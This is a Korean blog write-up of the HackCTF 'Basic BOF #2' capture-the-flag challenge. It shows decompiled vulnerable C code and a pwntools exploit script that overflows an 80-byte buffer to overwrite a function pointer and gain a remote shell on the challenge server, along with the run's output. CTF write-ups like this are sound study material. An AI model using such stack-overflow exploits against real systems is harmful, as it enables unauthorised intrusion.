Phantom

HackCTF Basic BOF #2 본문

Pwnable/HackCTF

HackCTF Basic BOF #2

Ph4nt0m_ 2022. 9. 1. 17:00
반응형

Basic BOF #2

Source

nt __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[80]; // [esp+Ch] [ebp-8Ch]
  void (*v5)(void); // [esp+8Ch] [ebp-Ch]

  v5 = (void (*)(void))sup;
  fgets(s, 133, stdin);
  v5();
  return 0;
}

Solve

from pwn import *

e = ELF("./bof_basic2")
#p = process("./bof_basic2")
r = remote("ctf.j0n9hyun.xyz", 3001)
shell = 0x804849b
payload = ''
payload += "A"*80
payload += "B"*48
payload += p32(shell)

r.sendline(payload)
r.interactive()
➜  hackctf python bof_basic2.py
[*] '/home/ubuntu/ctf/hackctf/bof_basic2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3001: Done
[*] Switching to interactive mode
$ id
uid=1000(attack) gid=1000(attack) groups=1000(attack)

Uploaded by Notion2Tistory v1.1.0

반응형

'Pwnable > HackCTF' 카테고리의 다른 글

HackCTF x64 Buffer Overflow  (0) 2022.09.01
HackCTF Simple_overflow_ver_2  (0) 2022.09.01
HackCTF x64 Simple_size_BOF  (0) 2022.09.01
HackCTF 내 버퍼가 흘러넘친다!!!  (0) 2022.09.01
HackCTF Basic BOF #1  (0) 2022.09.01
'Pwnable/HackCTF' Related Articles more
Comments